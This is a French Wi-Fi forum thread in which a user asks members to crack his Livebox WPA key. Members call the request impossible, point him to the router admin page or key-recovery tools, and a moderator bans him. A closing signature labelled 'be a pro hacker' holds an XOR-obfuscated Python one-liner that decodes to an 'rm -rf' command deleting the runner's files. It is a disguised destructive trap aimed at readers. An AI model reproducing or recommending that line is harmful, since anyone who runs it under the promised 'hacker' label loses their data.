Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-11-2012 04:21:31

yoann
Banni(e)

j'ai un problème... quelqu’un a t'il une solution ???

Tout d’abord Bonjour.
Voila j'ai un petit problème qui me bouffe la vie!!! ma clef wpa n’apparaît pas car il n'y a pas d’étiquette sous ma livebox. c'est anormal y me semble!
J'ai donc récupérer les paquets avec commview mais cela n'a pas marcher. Pourquoi? je ne sait pas pourtant j'ai plus d' 1 millions d'IVS!!!
J'ai donc abandonner cette technique.
Ensuite je me suis mit a télécharger des dico et des dico livebox. rien a y faire je suis donc dégoûter car voila j'ai acheter une télévision une console d’occasion un black-ops 2 et pas moyen d'y jouer car la prise pour l'ethernet de la console  et défectueuse!! je m'en arrache les cheveux s'il vous plait ne me dite pas achète une autre console j'ai pas les moyens.
En gros quelqu'un qui a les dicos pour ma livebox pourrait t'il m'aider en m'expliquant comment bien faire cette manipulation avec les dico ou me dire c'est quoi ma clef wpa cela fait 2 semaine que je suis dessus ce probleme sérieux sa serait vraiment sympa car la j'ai vraiment besoin d'aide.
MERCI a ceux qui me répondrons positif évidamment

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-11-2012 05:12:41

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : j'ai un problème... quelqu’un a t'il une solution ???

Salut et bienvenue sur le forum wink

Si tu dis que la clé WPA ne figure pas sur la vignette au dos de la Livebox, comment as-tu fais pour te connecter dans le passé ? à moins que cette box n'a jamais été utilisée depuis sa livraison. Si un ordinateur s'est déjà connecté à cette box, il garde une trace de cette connexion et enregistre la clé WPA quelque par dans la base de registre de Windows. Pour cela, essaie d'utiliser Wireless Key View ou le Network password recevery, ils vont te permettre de dévoiler toutes les clés enregistrées sur ton ordinateur mais désactive ton antivirus car ils sont signalés comme des virus wink

#3 28-11-2012 05:32:08

yoann
Banni(e)

Non je ne me suis pas encore connecter dessus mon ordinateur et neuf du mois dernier.
Et y me semble que c mon petit frère qui a enlever l'étiquette y le fait sur tous les appareilles électronique.
Personne ne pourrait me la trouver avec  un dico si j'envoie
1 OU 2 fichier de paquet pour la manipulation car je sature de cette situation pourri^^
En vrais je serait être reconnaissant envers la communauté de ce forum de m'aider sincèrement  et cette livebox de mer.. je vais la bruler j'en ai mare et orange et pas capable de me le donner.

#4 28-11-2012 06:07:29

Telestra
Membre Hyperactif

Bonjour.

1 - Tu te connecte avec un cable ethernet
2 - dans un naviagteur tu tape 192.168.1.1
3 - log & pass > admin & admin
4 - dans la section securité wifi du pannel de config de la box, tu as la clé WPA

#5 28-11-2012 06:22:18

yoann
Banni(e)

Ok telestra mais pour cela faudrait t'il encore que mon ordinateur se connecte dessus et un câble ethernet perso sa me fais grave chi.. 50 m de câble deux étages ces pas le must
Et j'ai pas envie d'en acheter un... j'ai déjà fais assez de frais y a personnes qui peut me la récupérer a coup de dico je suis a la limite de vriller!
Faut que je paye pour qu'on me rende ce service pour des pro sa prend 5 min en plus^^ sérieux les gars y en a bien qui peut être compréhensible. SVP
la mon forfait internet de mon portable a pris un sacrée cartouche et j'en ai ras le bol de naviguer sur un telephone

#6 28-11-2012 06:40:55

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bienvenue yoan smile
Personne ici n'a les moyens techniques pour réaliser une telle tâche en 5 minutes, ni dix, ni un moi, ni une année, ni un siècle.
Google doit pouvoir te rompre ça en 5 minutes avec le centre google X ou le pentagone, peut être, mais on parle la vraiment des pros de chez pros avec des ordinateurs qui font la taille d'un garage.
Après la solution est toute simple, tu déplace un court instant ta box, la place proche de ton ordinateur, ou le contraire, et tu connecte avec un cable ethernet tout vieux tout pourris et court... si tu n'en a pas tu t'en procures un, sa coûte 60 cm le mètre....  un mètre te suffit, tu récupère la clef et tu la garde.

#7 28-11-2012 06:51:30

yoann
Banni(e)

ouai donc en gros je vais me faire voir ailleurs!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
alors que j'ai cas envoyer un fichier a une personne qui a les dico qui me répondra en me donnant ma clef wep et j'ai pas envie de déplacer quoi se soit n'y d'acheter quoi se soit je demander un coup de main on me répond gentillement va te faire ...
pas cool les gars sa fait 2 semaine je galère je comprend vous vous en foutez mais pas moi

#8 28-11-2012 07:16:30

yoann
Banni(e)

Voila un de mes fichier capturer si quelqu'un a les dicos si y veut bien m'aider ces un BG^^
live-box-0460.zip

#9 28-11-2012 08:38:38

yasmine
Membre Indispensable

yoann a écrit :

... me donnant ma clef wep

Déjà

C est du wpa ou du wep ????

#10 28-11-2012 08:44:50

yoann
Banni(e)

wpa-psk

#11 28-11-2012 08:46:23

yasmine
Membre Indispensable

tu sais capturer un handshake ! (et tous ses préparatifs)

et tu ne sais pas mettre un cable RJ45 entre ta live-box et ton pc ...pour récuperer ce que tu veux

Je parle pour moi: à ce point tu me prends pour une idiote ?

#12 28-11-2012 08:53:42

yoann
Banni(e)

j'ai pas envie de déplacer ma tour elle et trop grosse et je suis chez ma belle mére c une sacrée conne elle va vriller si je commence a tout transporter^^ voila et non je ne te prend pas pour une idiote. oui je sais capturer mais sa marche pas.
et c pour sa que j'ai besoin de quelqu'un.

#13 28-11-2012 08:56:00

yoann
Banni(e)

pourquoi tu ma demander wep ou wpa ???  jme suis mal exprimer

#14 28-11-2012 10:41:54

djdophin
Membre Actif

yoann a écrit :

Franchement ce connecter en lan (tu en à pour 5 min, ça prend vraiment pas beaucoup de temps) tu va sur l'adresse IP de ta box (198.168.0.1 il me semble) tu va dans les configs de ta box et tu récupère ta clé ensuite tu la remet en wifi et hop fini !!!!

#15 28-11-2012 10:43:17

djdophin
Membre Actif

djdophin a écrit :
yoann a écrit :

Franchement ce connecter en lan (tu en à pour 5 min, ça prend vraiment pas beaucoup de temps) tu va sur l'adresse IP de ta box (192.168.1.1 il me semble) tu va dans les configs de ta box et tu récupère ta clé ensuite tu la remet en wifi et hop fini !!!!

#16 28-11-2012 10:57:01

yoann
Banni(e)

hop fini la geule jaimerai ty voir tu croit jy et pas deja penser le truc c jai pas ldroit deplacer le pc ailleur que ds ma piole serieux les gars en vrais

#17 28-11-2012 11:08:41

antares145
Membre d'honneur
Site Web

Il semble que mes collègues n'ont pas été assez clairs, donc remettons-en une couche :

Ce que tu nous demandes est impossible, personne ici n'a la capacité de casser une clé WPA Livebox d'origine. Aucun particulier n'en est capable, ni sur ce forum ni sur un autre, et ceux qui te diront le contraire sont des mythos ou des escrocs.

A l'impossible nul n'est tenu, on ne peut pas faire de miracle. Et surtout si t'as la flemme de bouger ta box (je dis bien : la BOX) 5 minutes le temps de faire l'essai, je vois pas pourquoi on ferait des efforts pour t'aider. Si c'était du WEP, ce serait jouable, mais en WPA tu peux oublier, personne ne peut rien pour toi (sauf peut-être les agences gouvernementales US, et encore). Ici on ne peut rien pour toi. Ça va, c'est clair là ?

Après, si ça ne te plait pas, pas la peine de t'emballer, personne ne t'oblige à rester.

Bonne journée smile

[EDIT]Et accessoirement, ton topic n'a rien à voir avec la section...

Dernière modification par antares145 (28-11-2012 11:10:24)

#18 29-11-2012 09:11:24

spawn
Modérateur

Bien.

Bonjour mon garçon.
La prochaine fois, tu resteras poli avec les personnes qualifiées qui répondent à ton problème auquel tu ne comprends rien.
Comme manifestement la box n'est pas à toi, sinon tu n'aurais pas eu de problème à récupérer le mot de passe, je considère que tu enfreins les règles.

La courtoisie, ce n'est pas superflu.
Kick-Ban.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce